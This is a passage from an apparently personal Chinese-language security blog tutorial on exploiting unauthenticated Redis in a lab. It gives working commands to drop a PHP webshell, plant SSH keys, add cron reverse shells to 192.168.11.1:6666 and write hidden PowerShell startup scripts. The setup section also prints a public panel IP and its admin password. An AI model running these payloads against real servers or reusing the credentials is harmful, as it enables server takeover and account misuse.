<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="Redis漏洞利用, Yang Hao&#39;s blog">
    <meta name="description" content="Yang Hao&#39;s blog">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->

<script async src="https://www.googletagmanager.com/gtag/js?id=G-KYC8PY5RS4"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() {
        dataLayer.push(arguments);
    }

    gtag('js', new Date());
    gtag('config', 'G-KYC8PY5RS4');
</script>


    <title>Redis漏洞利用 | Yang Hao&#39;s blog</title>
    <link rel="icon" type="image/x-icon, image/vnd.microsoft.icon" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/favicon.ico">

    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/css/matery.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/css/my.css">

    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/jquery/jquery.min.js"></script>
	<script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/live2d-widget/autoload.js"></script>

<meta name="generator" content="Hexo 5.1.1"><link rel="alternate" href="/atom.xml" title="Yang Hao's blog" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Yang Hao&#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="javascript:void(0);" class="waves-effect waves-light">

      
      <i class="fas fa-list" style="zoom: 0.6;"></i>
      
      <span>文章</span>
      <i class="fas fa-chevron-down" aria-hidden="true" style="zoom: 0.6;"></i>
    </a>
    <ul class="sub-nav menus_item_child ">
      
      <li>
        <a href="/tags">
          
          <i class="fas fa-tags" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>标签</span>
        </a>
      </li>
      
      <li>
        <a href="/categories">
          
          <i class="fas fa-bookmark" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>分类</span>
        </a>
      </li>
      
      <li>
        <a href="/archives">
          
          <i class="fas fa-archive" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>归档</span>
        </a>
      </li>
      
    </ul>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Yang Hao&#39;s blog</div>
        <div class="logo-desc">
            
            Yang Hao&#39;s blog
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="javascript:;">
			
				<i class="fa-fw fas fa-list"></i>
			
			文章
			<span class="m-icon"><i class="fas fa-chevron-right"></i></span>
		</a>
            <ul  style="background:  ;" >
              
                <li>

                  <a href="/tags " style="margin-left:50px">
				  
				   <i class="fa fas fa-tags" style="position: absolute;left:28px" ></i>
			      
		          <span>标签</span>
                  </a>
                </li>
              
                <li>

                  <a href="/categories " style="margin-left:50px">
				  
				   <i class="fa fas fa-bookmark" style="position: absolute;left:28px" ></i>
			      
		          <span>分类</span>
                  </a>
                </li>
              
                <li>

                  <a href="/archives " style="margin-left:50px">
				  
				   <i class="fa fas fa-archive" style="position: absolute;left:28px" ></i>
			      
		          <span>归档</span>
                  </a>
                </li>
              
            </ul>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/c54b4438d8fb064d0c827998804a2f89.png')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">Redis漏洞利用</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/Redis%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">
                                <span class="chip bg-color">Redis漏洞利用</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/" class="post-category">
                                漏洞利用
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-10-09
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2021-10-16
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    4.2k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    18 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="0x01-简介"><a href="#0x01-简介" class="headerlink" title="0x01 简介"></a>0x01 简介</h2><p>Redis 是一种开源、基于内存的数据结构存储，被用作数据库、缓存和消息代理。其在低版本(&lt;3.2.0 ，从 3.2.0 版本开始，当 Redis 使用默认配置（绑定所有接口）并且没有任何密码来访问它时，它会进入一种称为保护模式的特殊 模式。在这种模式下，Redis 只回复来自环回接口的查询，并回复从其他地址连接的其他客户端有错误，解释发生了什么以及如何正确配置 Redis。)上默认配置绑定在0.0.0.0:6379上且未设置密码验证，导致未授权访问，可结合其他命令组合获取权限。Redis安全性介绍 <a target="_blank" rel="noopener" href="https://redis.io/topics/security">https://redis.io/topics/security</a> 。</p>
<h2 id="0x02-环境搭建"><a href="#0x02-环境搭建" class="headerlink" title="0x02 环境搭建"></a>0x02 环境搭建</h2><p>环境根据需要选择，Ubuntu/Centos/Windows下环境搭建可以参考下列记录：<br><strong>Redis连接/管理工具</strong><br>1.<a target="_blank" rel="noopener" href="https://redis.io/topics/rediscli">Redis-cli</a>，<a target="_blank" rel="noopener" href="https://github.com/yanghaoi/exploits/tree/master/Redis">可执行文件下载</a>。Redis 命令行界面 ，Redis安装完成后自带，命令格式<code>redis-cli -h host -p port -a password command</code>:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/d8404e2e7e21ff91cb8d5c33e8bb6162.png"></p>
<p>2.<a target="_blank" rel="noopener" href="https://github.com/caoxinyu/RedisClient">RedisClient</a> ，GUI管理工具，有exe和Jar包两种执行文件：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/b9c3e605076e53db04eacead51fa9d22.png"></p>
<p>3.<a target="_blank" rel="noopener" href="https://github.com/lloy1231/RedisDesktopManager-Windows">redis-desktop-manager</a> ，开源的可视化工具，安装包新版本需要付费<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/832c0d96d1647bc1aa55340600d03ca9.png"></p>
<p>4.<a target="_blank" rel="noopener" href="https://github.com/qishibo/AnotherRedisDesktopManager">AnotherRedisDesktopManager</a>，另一个可视化管理工具，开源免费：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/f198fabfa3bbec5e98742d65133b75af.png"></p>
<p><strong>Redis Install For Linux</strong>： <a target="_blank" rel="noopener" href="https://github.com/redis/redis">Redis仓库</a>     <a target="_blank" rel="noopener" href="https://redis.io/download">官网下载地址</a><br>以源码编译安装的方式在Linux下搭建3.2.0来验证默认配置下的保护模式，然后安装3.0.7版本在默认配置下进行利用，最后安装4.x/5.x/6.x配置未授权进行利用。</p>
<p>1.先安装下3.2.0版本，观察在3.2.0的默认配置下是否如官网描述的安全性情况：</p>
<pre class="line-numbers language-shell"><code class="language-shell">$ wget https://download.redis.io/releases/redis-3.2.0.tar.gz
$ tar xzf redis-3.2.0.tar.gz
$ cd redis-3.2.0
$ make
$ cd src && ./redis-server<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/ed7c038d7978ce468ce1d0ef7baea7cc.png"><br>这时候使用外部IP连接时果然会提示，所以在Linux版本&gt;=3.2.0以上没有手动配置绑定在外部IP上的话是不能远程利用的：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/f0d65cdb6884b0218f0c93ec285a0b18.png"></p>
<p>2.安装3.0.7(&lt;3.2.0最近的就是这个了)：</p>
<pre class="line-numbers language-shell"><code class="language-shell">$ wget https://download.redis.io/releases/redis-3.0.7.tar.gz
$ tar xzf redis-3.0.7.tar.gz
$ cd redis-3.0.7
$ make
$ cd src && ./redis-server<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/c897142bf1526e1e2e2b349066881acb.png"></p>
<p>3.Redis6.2.6安装</p>
<pre class="line-numbers language-shell"><code class="language-shell">$ wget https://download.redis.io/releases/redis-6.2.6.tar.gz
$ tar xzf redis-6.2.6.tar.gz
$ cd redis-6.2.6
$ make
$ cd src && ./redis-server<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>4.Docker 环境<br>**<a target="_blank" rel="noopener" href="https://github.com/vulhub/vulhub/tree/master/redis/4-unacc">vulhub</a>**<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/ed8fb9d44d975a36d16033f3a26f3ab3.png"></p>
<p><strong><a target="_blank" rel="noopener" href="https://hub.docker.com/_/redis">dockerhub-redis</a></strong><br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/792704d7190b0d603cb165a695c2f52d.png"></p>
<pre class="line-numbers language-bash"><code class="language-bash">docker pull redis:5-bullseye<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/9c73d5c602c38d59d9e96092e13ca56e.png"></p>
<p><strong>Dockerhub-CnetOS</strong>:</p>
<pre class="line-numbers language-bash"><code class="language-bash">docker pull centos:latest
docker run -tid --name centos_1 -p 26379:6379 -p 18080:18080 -p 80:80 -p 9080:9080 -p 22:22 --privileged<span class="token operator">=</span>true centos:latest /sbin/init
yum <span class="token function">install</span> crontabs   <span class="token comment" spellcheck="true">#安装计划任务服务</span>
systemctl <span class="token function">enable</span> crond <span class="token comment" spellcheck="true">#设为开机启动</span>
systemctl start crond  <span class="token comment" spellcheck="true">#启动crond服务</span>
systemctl status crond <span class="token comment" spellcheck="true">#查看状态</span>
yum <span class="token function">install</span> <span class="token function">wget</span>
<span class="token comment" spellcheck="true">#下载编译好的redis-server到CentOS</span>
<span class="token function">wget</span> http://xxx/redis-server <span class="token operator">&amp;&amp;</span> <span class="token function">chmod</span> +x redis-server <span class="token operator">&amp;&amp;</span> ./redis-server
<span class="token comment" spellcheck="true">#openssh</span>
yum <span class="token function">install</span> openssh*
systemctl <span class="token function">enable</span> sshd 
systemctl start sshd
<span class="token comment" spellcheck="true">#phpstudy</span>
yum <span class="token function">install</span> -y <span class="token function">wget</span> <span class="token operator">&amp;&amp;</span> <span class="token function">wget</span> -O install.sh https://notdocker.xp.cn/install.sh <span class="token operator">&amp;&amp;</span> sh install.sh
请用浏览器访问面板:
外网:http://171.212.137.205:9080/B3A929
内网:http://172.17.0.3:9080/B3A929
系统初始账号:admin
系统初始密码:hLQGQ6HGP9
官网:https://www.xp.cn
如果使用的是云服务器，请至安全组开放9080端口
如果使用ftp，请开放21以及30000-30050端口

<span class="token comment" spellcheck="true">#ssh -fgN -L 8080:localhost:80 localhost</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>Redis Install For Windows</strong>：<a target="_blank" rel="noopener" href="https://github.com/dmajkic/redis/downloads">Redis&lt;2.4.5安装包</a> ， <a target="_blank" rel="noopener" href="https://www.xp.cn/download.html">PHPStudy-Redis3.0.504</a> ， <a target="_blank" rel="noopener" href="https://github.com/microsoftarchive/redis/releases">Redis-x64-3.2.100.msi</a><br>分别是2.4.5，3.0.504，3.2.100三个版本，启动后为当前用户权限：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/4a64eea99d9856ecf4545f935aff74ac.png"><br>Redis-x64-3.2.100.msi安装后会以服务形式启动：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/eb11327e4b205370d64d7e2b55e1cb7e.png"></p>
<p><strong>Rdies-cli命令监控</strong></p>
<pre class="line-numbers language-cmd"><code class="language-cmd">redis-cli -h 192.168.200.97 monitor<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h2 id="0x03-利用方式"><a href="#0x03-利用方式" class="headerlink" title="0x03 利用方式"></a>0x03 利用方式</h2><h3 id="密码爆破"><a href="#密码爆破" class="headerlink" title="密码爆破"></a>密码爆破</h3><h3 id="信息获取"><a href="#信息获取" class="headerlink" title="信息获取"></a>信息获取</h3><p> <code>CLIENT LIST</code>    #获取客户端连接信息<br> <img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/b84eb1177fba33809271c0dd872b5e99.png"></p>
<p><code>EVAL "return dofile('C:/Users/yanghao/NTUSER.DAT')" 0</code> #探测文件是否存在(&gt;2.6.0)<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/fe9fd97c62e0cc0443e241422100b2fc.png" alt="enter description here"></p>
<pre class="line-numbers language-cmd"><code class="language-cmd">#检测 redis 服务是否启动
ping

#查看是否设置了密码验证
CONFIG get requirepass

#设置密码为runoob
AUTH "runoob"

#获取 Redis 服务器的各种信息和统计数值
INFO

#查询配置参数
CONFIG GET

#设置配置参数
CONFIG STE

#设置KEY"runoobkey"的值为redis 
SET runoobkey redis

#删除KEY"runoobkey"
DEL runoobkey

#在后台异步保存当前数据库的数据到磁盘
BGSAVE

#返回当前数据库的 key 的数量
DBSIZE

#让 Redis 服务崩溃
DEBUG SEGFAULT

#删除所有数据库的所有key
FLUSHALL

#删除当前数据库的所有key
FLUSHDB

#返回最近一次 Redis 成功将数据保存到磁盘上的时间，以 UNIX 时间戳格式表示
LASTSAVE

#设置远程主服务器
SLAVEOF host port / REPLICAOF host port 

#断开主从连接
SLAVEOF ON ONE<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h3 id="Ridis持久化-数据集备份-利用"><a href="#Ridis持久化-数据集备份-利用" class="headerlink" title="Ridis持久化(数据集备份)利用"></a>Ridis持久化(数据集备份)利用</h3><p>Redis持久化是指可以将数据集保存到本地磁盘中的操作，有RDB和AOF两种方式，详见 <a target="_blank" rel="noopener" href="https://redis.io/topics/persistence">https://redis.io/topics/persistence</a> ，可利用数据备份将数据写入到磁盘，但是写入数据会包含Redis备份的标记存在脏数据，只能用于一些有容错性的利用。</p>
<h4 id="RDB备份文件利用"><a href="#RDB备份文件利用" class="headerlink" title="RDB备份文件利用"></a>RDB备份文件利用</h4><pre class="line-numbers language-cmd"><code class="language-cmd">DBSIZE                   # 统计KEYS
flushall                  # 如果键过多导致备份过大，全部清空KEYS(危险)
CONFIG GET slave-read-only      # 查询只读配置
CONFIG SET slave-read-only no    # 关闭只读配置
CONFIG GET DIR              # 查询目录
CONFIG SET dir /path/www/html    # 修改备份目录  
CONFIG GET dbfilename         # 查询备份文件名，方便恢复
CONFIG SET dbfilename trojan.php  # 修改备份文件名为我们的shell名
SET trojan "<?php phpinfo(); ?>"  # 设置KEY和值
BGSAVE  / SAVE              # 异步/阻塞 保存当前数据库的数据到磁盘
DEL trojan                 #删除恶意键          
恢复：
CONFIG SET dir /usr/local/redis   #恢复原来的目录
CONFIG SET dbfilename dump.rdb   # 恢复原来的备份文件<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>Linux写SSH公钥</strong><br><em>需要有对应用户目录的写入权限且ssh服务可以连接并开启了公钥登录，在Ubuntu上用Redis3.0.7测试</em><br>生成密钥对： <code>ssh-keygen -t rsa</code><br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/ee761b74f8d31b1b0843204eea9ec020.png"><br>在id_rsa.pub文件中首尾加上换行(复制完记得改回去)：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/9e74eff4168d783708cb94706a97d09a.png"><br>执行下列命令</p>
<pre class="line-numbers language-gams"><code class="language-gams">config set dir /root/.ssh
config set dbfilename authorized_keys
set authorized_keys "id_rsa.pub的内容"
bgsave<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/a88d17df4b2feb84d5ba54c964384dd3.png"><br>查看靶机已经写入成功：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/d71634977764e04614840a94d832ea2d.png"><br>登录成功：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/f9a696a39954a3c85bcc4f66dd9d2ad0.png"></p>
<p><strong>Linux写计划任务(root权限)</strong><br>计划任务介绍：<br><a target="_blank" rel="noopener" href="https://www.thegeekdiary.com/centos-rhel-begginners-guide-to-cron/">https://www.thegeekdiary.com/centos-rhel-begginners-guide-to-cron/</a><br><a target="_blank" rel="noopener" href="https://zh.wikipedia.org/wiki/Cron#crontab%E6%96%87%E4%BB%B6">https://zh.wikipedia.org/wiki/Cron#crontab%E6%96%87%E4%BB%B6</a></p>
<p><code>/etc/crontab</code>和<code>/etc/cron.*</code>目录下的任务时间表（crontabs）文件是系统层次的，格式如下：</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 文件格式說明</span>
<span class="token comment" spellcheck="true"># ┌──分鐘（0 - 59）</span>
<span class="token comment" spellcheck="true"># │ ┌──小時（0 - 23）</span>
<span class="token comment" spellcheck="true"># │ │ ┌──日（1 - 31）</span>
<span class="token comment" spellcheck="true"># │ │ │ ┌─月（1 - 12）</span>
<span class="token comment" spellcheck="true"># │ │ │ │ ┌─星期（0 - 6，表示从周日到周六）</span>
<span class="token comment" spellcheck="true"># │ │ │ │ │</span>
<span class="token comment" spellcheck="true"># *  *  *  *  *  用户名 被執行的命令</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>系统层次的任务时间表（crontabs）的任务经常会指定一个或以上的用户进行执行，因此任务时间表（crontabs）文件需要增加“用户名”字段。<code>/etc/crontab</code> 文件定期自动执行多个子目录中的项目。放置在不同目录中<code>/etc/cron.*</code>脚本按照下面给出的时间间隔运行。这些目录中的所有脚本都以 root 权限运行。<br>| 目录     | 时间 |<br>|:—–|:—–|<br>| /etc/cron.d  | 几分钟 |<br>| /etc/cron.hourly |每小时的第一分钟 |<br>| /etc/cron.daily | 每天凌晨 3:05 至晚上 10.55 |<br>| /etc/cron.weekly |自上次执行后 7 天后的上午 3:25 至晚上 11:10 之间 |<br>| /etc/cron.monthly | 自上次执行后一个月后的凌晨 3:45 至晚上 11:30 之间 | </p>
<p><code>/var/spool/cron/</code>下的任务时间表（crontab）文件是用户层次的（但是只能root权限建），计划任务文件的名称与用户的用户名相同，格式如下：</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 文件格式說明</span>
<span class="token comment" spellcheck="true"># ┌──分鐘（0 - 59）</span>
<span class="token comment" spellcheck="true"># │ ┌──小時（0 - 23）</span>
<span class="token comment" spellcheck="true"># │ │ ┌──日（1 - 31）</span>
<span class="token comment" spellcheck="true"># │ │ │ ┌─月（1 - 12）</span>
<span class="token comment" spellcheck="true"># │ │ │ │ ┌─星期（0 - 6，表示从周日到周六）</span>
<span class="token comment" spellcheck="true"># │ │ │ │ │</span>
<span class="token comment" spellcheck="true"># *  *  *  *  * 被執行的命令</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>由于Ubuntu的计划任务不能容错:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/2c504bdb7af9d8e9b5c186a817c25768.png"><br>用Docker搭建了CentOS环境来测试，Redis命令写入计划任务(需要权限)文件夹<code>/etc/cron.d</code>：</p>
<pre class="line-numbers language-bash"><code class="language-bash">config <span class="token keyword">set</span> <span class="token function">dir</span> /etc/cron.d
config <span class="token keyword">set</span> dbfilename x
<span class="token keyword">set</span> x <span class="token string">"\n\nSHELL=/bin/bash\n\n* * * * * root bash -i >&amp; /dev/tcp/192.168.11.1/6666 0>&amp;1\n\n"</span>
<span class="token comment" spellcheck="true">#set x "\n\n* * * * * ftp bash -i >&amp; /dev/tcp/192.168.11.1/6666 0>&amp;1\n\n"</span>
save<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/a01700f56255272f2e5657941c08f9f3.png"></p>
<p>写入 <code>/var/spool/cron/</code>：</p>
<pre class="line-numbers language-bash"><code class="language-bash">FLUSHALL
config <span class="token keyword">set</span> <span class="token function">dir</span> /var/spool/cron
config <span class="token keyword">set</span> dbfilename bin  <span class="token comment" spellcheck="true"># 以用户名命名文件</span>
<span class="token keyword">set</span> x <span class="token string">"\n* * * * * bash -i >&amp; /dev/tcp/192.168.11.1/6666 0>&amp;1\n"</span>
save<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>反弹回bin用户的shell:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/c5f026052faf1c2c331f8c88d055d30a.png"></p>
<p><strong>Windows写启动项</strong><br>通过文件写入启动项后，在系统重启后执行脚本，主要是写.bat .cmd等支持容错的文件执行其他命令(powershell、mshta、regsvr32等等)来利用(windows下换行<code>\r\n</code>)：</p>
<pre class="line-numbers language-cmd"><code class="language-cmd"># 这是系统启动项，如果权限不足时利用set dir或EVAL "return dofile"目录/文件探测方式去找用户启动目录
config set dir "C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp" 
config set dbfilename info.bat
set x "\r\n\r\npowershell.exe -nop -w hidden -enc xxxxx\r\n\r\n"
save<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/744be6544214bae378f65fce5ee066d8.png"></p>
<p><strong>Windows文件覆盖</strong><br>有时候目标服务器一直不会重启，那么可以考虑覆盖一些其他的bat文件等来增加触发几率，可以利用<code>EVAL "return dofile('xxx') 0</code>探测文件是否真的存在，PHPStudy环境中的bat文件，UAC必须关掉：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/9e48cf26937d98b3a102eb6b412dd96b.png"><br>通过Redis默认的dir参数可以知道绝对路径：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/0b77db0e5556150ce63a48b52033dc8a.png"><br>覆盖Apache端口检测check.bat:</p>
<pre class="line-numbers language-cmd"><code class="language-cmd">config set dir "D:/phpstudy_pro/Extensions/Apache2.4.39/bin"
config set dbfilename check.bat
set x "\r\n\r\nhttpd.exe\r\ncmd /c calc\r\npause > nul\r\n"
save<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
